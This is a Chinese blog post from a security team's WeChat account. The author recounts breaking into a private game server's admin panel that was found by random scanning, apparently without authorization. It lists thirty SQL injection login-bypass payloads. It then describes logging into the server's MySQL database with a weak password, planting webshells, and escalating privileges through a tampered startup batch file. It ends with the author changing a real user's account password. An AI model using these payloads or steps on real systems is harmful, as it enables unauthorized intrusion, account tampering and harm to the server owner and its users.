微信公众号:渊龙Sec安全团队
为国之安全而奋斗,为信息安全而发声!
如有问题或建议,请在公众号留言
如果你觉得本文对你有帮助,欢迎在文章底部赞赏我们
前言
因为疫情整天宅在家里,实属无聊,然后就在网上到处乱点乱扫……
然后便扫到一个IP(124.132.**.),存在admin和www目录
前期情报收集
随手去百度找了一下这个站长的QQ号
不难看出,这应该是个私服后台
漏洞利用
记得以前搞过类似的站点,直接上手PHP万能密码试试
1:admin'/*
密码*/':
2:‘or’=’or’
3:‘or 1=1/* 【字符型 GPC是否开都可以使用】
4:User: something
Pass: ‘ OR ‘1’=’1
5:"or "a"="a
6:"or 1=1--
7:"or"="
8:"or"="a'='a
9:"or1=1--
10:"or=or"
11:''or'='or'
12:') or ('a'='a
13:'.).or.('.a.'='.a
14:'or 1=1
15:'or 1=1--
16:'or 1=1/*
17:'or"="a'='a
18:'or' '1'='1'
19:'or''='
20:'or''=''or''='
21:'or'='1'
22:'or'='or'
23:'or.'a.'='a
24:'or1=1--
25:1'or'1'='1
26:a'or' 1=1--
27:a'or'1=1--
28:or 'a'='a'
29:or 1=1--
30:or1=1--
哦哟哟哟哟,成功进入后台
那我们看看有什么功能咯,GM工具…就是充值、发放物品之类的工具
哦吼,看到用户数据了
然后我玩了后台几天,想找办法getshell,但是没有上传点
突然我想到私服游戏,一般数据库密码都是弱口令,比如123456 root 之类
然后掏出navicat远程连接默认3306端口,密码123456
连接一下就成功了,看看权限然后尝试MySQL写一句话(绝对路径后台报错可得)
菜刀一连,居然直接成功了!马上去上传大马(后期发现服务器没有狗)
由于当时忘了截图,这里就不再复述
(ps: 网上下载过来的大马基本都有后门,发现后果断去除)
来执行一下命令看看
嘿嘿,再看看
然后发现权限小的可怜…然后就陷入困境
然后就各种找工具,找了两天没找到(提权exp,忘记说这个私服是Windows Server 2008了)
提权
突然想起以前自己搭建私服玩时,服务器文件里有bat启动文件
再想起某牛,曾经和我说过利用bat进行提权
然后找了一下,找到了bat文件,果断写用户提权的命令
然后查找游戏主程序的进程,以命令结束之,等待管理员运行bat文件
可以看到本地的3389端口,远程映射后是19989端口
=.=等管理员执行bat文件后,第二天就拿下了服务器
后续
另外还发现了一些东西
找到了游戏的apk安装包
下载下来,在后台随便改了个用户的账号密码,去爽了一把
这次能搞下来,纯属运气好吧...
点到为止吧(其实我也不知道还能干什么,就是想分享一下思路)
我是少陵野老,我在渊龙Sec安全团队等你
微信公众号:渊龙Sec安全团队
欢迎关注我,一起学习,一起进步~
本篇文章为团队成员原创文章,请不要擅自盗取!
下面是我们公众号二维码,欢迎各位师傅关注!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论